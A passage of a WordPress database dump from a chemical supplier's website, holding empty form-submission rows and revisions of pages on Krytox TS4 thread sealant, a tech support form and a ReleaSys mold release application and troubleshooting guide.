INSERT INTO `wp_posts` VALUES (3670, 0, '2017-02-21 15:30:37', '2017-02-21 15:30:37', '', '', '', 'publish', 'closed', 'closed', '', '3670', '', '', '2017-02-21 15:30:37', '2017-02-21 15:30:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/3670/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3671, 0, '2017-02-21 19:17:46', '2017-02-21 19:17:46', '', '', '', 'publish', 'closed', 'closed', '', '3671', '', '', '2017-02-21 19:17:47', '2017-02-21 19:17:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/3671/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3672, 0, '2017-02-21 21:10:29', '2017-02-21 21:10:29', '', '', '', 'publish', 'closed', 'closed', '', '3672', '', '', '2017-02-21 21:10:29', '2017-02-21 21:10:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3672/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3673, 0, '2017-02-22 06:41:39', '2017-02-22 06:41:39', '', '', '', 'publish', 'closed', 'closed', '', '3673', '', '', '2017-02-22 06:41:39', '2017-02-22 06:41:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/3673/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3674, 0, '2017-02-22 14:29:28', '2017-02-22 14:29:28', '', '', '', 'publish', 'closed', 'closed', '', '3674', '', '', '2017-02-22 14:29:29', '2017-02-22 14:29:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3674/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3675, 0, '2017-02-22 15:31:32', '2017-02-22 15:31:32', '', '', '', 'publish', 'closed', 'closed', '', '3675', '', '', '2017-02-22 15:31:32', '2017-02-22 15:31:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/3675/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3676, 0, '2017-02-22 16:06:00', '2017-02-22 16:06:00', '', '', '', 'publish', 'closed', 'closed', '', '3676', '', '', '2017-02-22 16:06:00', '2017-02-22 16:06:00', '', 0, 'https://www.miller-stephenson.com/nf_sub/3676/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3677, 2, '2017-02-22 16:07:37', '2017-02-22 16:07:37', '<h3>For URGENT requests, please call us at: 203-743-4447 (8-4 EST)</h3>\n<p>&nbsp;</p>\n<h4>Technical Support Request Form:</h4>\n<p>[ninja_form id=11]</p>', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2017-02-22 16:07:37', '2017-02-22 16:07:37', '', 122, 'https://www.miller-stephenson.com/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3678, 2, '2017-02-22 16:10:41', '2017-02-22 16:10:41', '', 'shutterstock_161788985', '', 'inherit', 'closed', 'closed', '', 'shutterstock_161788985', '', '', '2017-02-22 16:10:41', '2017-02-22 16:10:41', '', 122, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_161788985.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3679, 2, '2017-02-22 16:10:54', '2017-02-22 16:10:54', '<h3>For URGENT requests, please call us at: 203-743-4447 (8-4 EST)</h3>\r\n&nbsp;\r\n<h4>Technical Support Request Form:</h4>\r\n[ninja_form id=11]', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2017-02-22 16:10:54', '2017-02-22 16:10:54', '', 122, 'https://www.miller-stephenson.com/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3680, 2, '2017-02-22 16:13:35', '2017-02-22 16:13:35', '<h3>For URGENT requests, please call us at: 203-743-4447 (8-4 EST)</h3>\r\n<img class="alignnone  wp-image-3678" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_161788985.jpg" alt="shutterstock_161788985" width="548" height="352" />\r\n<h4>Technical Support Request Form:</h4>\r\n[ninja_form id=11]', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2017-02-22 16:13:35', '2017-02-22 16:13:35', '', 122, 'https://www.miller-stephenson.com/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3681, 2, '2017-02-22 16:17:43', '2017-02-22 16:17:43', '<h3>For URGENT requests, please call us at: 203-743-4447 (8-4 EST)</h3>\r\n<h4>Technical Support Request Form:</h4>\r\n[ninja_form id=11]', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2017-02-22 16:17:43', '2017-02-22 16:17:43', '', 122, 'https://www.miller-stephenson.com/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3682, 0, '2017-02-22 16:44:26', '2017-02-22 16:44:26', '', '', '', 'publish', 'closed', 'closed', '', '3682', '', '', '2017-02-22 16:44:26', '2017-02-22 16:44:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/3682/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3683, 0, '2017-02-22 17:41:31', '2017-02-22 17:41:31', '', '', '', 'publish', 'closed', 'closed', '', '3683', '', '', '2017-02-22 17:41:31', '2017-02-22 17:41:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3683/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3684, 0, '2017-02-22 18:06:59', '2017-02-22 18:06:59', '', '', '', 'publish', 'closed', 'closed', '', '3684', '', '', '2017-02-22 18:06:59', '2017-02-22 18:06:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/3684/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3685, 0, '2017-02-22 19:58:36', '2017-02-22 19:58:36', '', '', '', 'publish', 'closed', 'closed', '', '3685', '', '', '2017-02-22 19:58:36', '2017-02-22 19:58:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/3685/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3686, 0, '2017-02-22 20:02:40', '2017-02-22 20:02:40', '', '', '', 'publish', 'closed', 'closed', '', '3686', '', '', '2017-02-22 20:02:40', '2017-02-22 20:02:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/3686/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3687, 0, '2017-02-22 21:31:12', '2017-02-22 21:31:12', '', '', '', 'publish', 'closed', 'closed', '', '3687', '', '', '2017-02-22 21:31:13', '2017-02-22 21:31:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/3687/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3688, 0, '2017-02-23 02:52:27', '2017-02-23 02:52:27', '', '', '', 'publish', 'closed', 'closed', '', '3688', '', '', '2017-02-23 02:52:27', '2017-02-23 02:52:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/3688/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3689, 0, '2017-02-23 07:52:02', '2017-02-23 07:52:02', '', '', '', 'publish', 'closed', 'closed', '', '3689', '', '', '2017-02-23 07:52:02', '2017-02-23 07:52:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/3689/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3692, 0, '2017-02-23 11:57:07', '2017-02-23 11:57:07', '', '', '', 'publish', 'closed', 'closed', '', '3692', '', '', '2017-02-23 11:57:08', '2017-02-23 11:57:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/3692/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3693, 2, '2017-02-23 15:21:28', '2017-02-23 15:21:28', '<h1>[share title=""]</h1>\r\n<h1><strong>Krytox TS4 Thread Sealant</strong></h1>\r\n<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly. Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n<h4><strong>Key Benefits of Krytox™ TS4:</strong></h4>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<h4><strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong></h4>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n<h4><strong>Recommended Product:</strong></h4>\r\n[ux_product_categories ids="165" number="10"]\r\n\r\n&nbsp;', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2017-02-23 15:21:28', '2017-02-23 15:21:28', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3697, 3, '2017-02-23 20:08:19', '2017-02-23 20:08:19', '<h1 data-canvas-width="370.56179999999995"><strong>Mold Release Application Guide -  ReleaSys™ </strong></h1>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n\r\n<h4><span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span></h4>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n\r\n<h4><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span></h4>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <strong>ReleaSys <a href="https://www.miller-stephenson.com/product/water-based-ptfe-release-agent/">82</a>, <a href="https://www.miller-stephenson.com/product/rubber-mold-release-agents/">85</a>, <a href="https://www.miller-stephenson.com/product/water-based-mold-release-agent/">88</a>, and <a href="https://www.miller-stephenson.com/product/release-agents/">89</a></strong>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set the HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 0.6 mm to 1.0 mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<h4 style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></h4>\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<h4 style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></h4>\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete <span style="background-color: #ffffff;">failure </span>to obtain release</strong></span></td>\r\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\r\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></li>\r\n 	<li><strong>If you require any further technical or application support please contact our technical staff</strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide - ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2017-02-23 20:08:19', '2017-02-23 20:08:19', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3698, 0, '2017-02-23 20:19:01', '2017-02-23 20:19:01', '', '', '', 'publish', 'closed', 'closed', '', '3698', '', '', '2017-02-23 20:19:01', '2017-02-23 20:19:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/3698/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3699, 0, '2017-02-24 02:01:16', '2017-02-24 02:01:16', '', '', '', 'publish', 'closed', 'closed', '', '3699', '', '', '2017-02-24 02:01:17', '2017-02-24 02:01:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/3699/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3700, 0, '2017-02-24 04:48:49', '2017-02-24 04:48:49', '', '', '', 'publish', 'closed', 'closed', '', '3700', '', '', '2017-02-24 04:48:49', '2017-02-24 04:48:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/3700/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3701, 0, '2017-02-24 09:42:36', '2017-02-24 09:42:36', '', '', '', 'publish', 'closed', 'closed', '', '3701', '', '', '2017-02-24 09:42:36', '2017-02-24 09:42:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/3701/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3702, 3, '2017-05-30 12:51:46', '2017-05-30 12:51:46', '<h1 data-canvas-width="370.56179999999995"><strong>Mold Release Application Guide -  ReleaSys™ </strong></h1>\n<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\n<div data-canvas-width="370.56179999999995">\n<ul style="text-align: justify;">\n 	<li>Very low transfer (contamination) to the molded part</li>\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\n 	<li>High suitability for rubber-to-metal bonding</li>\n 	<li>Low levels of in-mold build-up/fouling</li>\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\n 	<li>Extremely high release-ease</li>\n 	<li>Many releases (high durability) between applications</li>\n 	<li>Various slip levels</li>\n 	<li>Superb release for all polymer types</li>\n 	<li>Applicability for all molding processes</li>\n</ul>\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\n\n<h4><span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span></h4>\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\n\n<h4><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span></h4>\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <strong>ReleaSys <a href="https://www.miller-stephenson.com/product/water-based-ptfe-release-agent/">82</a>, <a href="https://www.miller-stephenson.com/product/rubber-mold-release-agents/">85</a>, <a href="https://www.miller-stephenson.com/product/water-based-mold-release-agent/">88</a>, and <a href="https://www.miller-stephenson.com/product/release-agents/">89</a></strong>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\n\n<ol>\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set the HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 0.6 mm to 1.0 mm.  Spray 8-12 inches from the surface with approximately 50% overlap.</li>\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\n<ul>\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\n</ul>\n</li>\n</ol>\n<h4 style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></h4>\n<ol>\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\n</ol>\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\n<h4 style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></h4>\n<table style="height: 634px;" width="1068">\n<tbody>\n<tr>\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete <span style="background-color: #ffffff;">failure </span>to obtain release</strong></span></td>\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\n<td><span style="font-size: 105%;">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 